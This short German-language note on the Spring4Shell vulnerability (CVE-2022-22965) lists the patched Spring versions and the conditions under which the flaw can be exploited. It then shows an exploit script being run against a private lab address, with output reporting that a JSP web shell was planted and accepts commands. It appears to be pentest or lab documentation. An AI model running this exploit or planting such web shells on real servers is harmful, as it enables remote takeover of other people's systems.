
Spring4Shell
Spring Framework 5.3.18 und 5.2.20
Spring Boot 2.6.6 und 2.5.12
Spring Core ist die Kernkomponente des Spring Framework. Es ist die Grundlage zum Aufbau anderer Komponenten im Spring Framework-Ökosystem wie Spring MVC, Spring Boot, Spring WebFlux. Der Exploit-Code ist unter den folgenden Bedingungen ausführbar:
JDK 9 oder höher
Apache Tomcat führt Servlet-Container aus
Verpackung als WAR
Paketabhängigkeiten: spring-webmvc oder spring-webflux
Wenn die Anwendung als ausführbare Spring Boot JAR-Datei bereitgestellt wird, was der Standard ist, ist sie von dieser Sicherheitslücke nicht betroffen.
python CVE-2022-22965.py --url http://172.16.1.10:8080/helloworld/greeting
└─$ python cve-spring4shell.py --url http://172.16.1.10:8080/helloworld/greeting
[*] Resetting Log Variables.
[*] Response code: 200
[*] Modifying Log Configurations
[*] Response code: 200
[*] Response Code: 200
[*] Resetting Log Variables.
[*] Response code: 200
[+] Exploit completed
[+] Check your target for a shell
[+] File: shell.jsp
[+] Shell should be at: http://172.16.1.10:8080/shell.jsp?cmd=id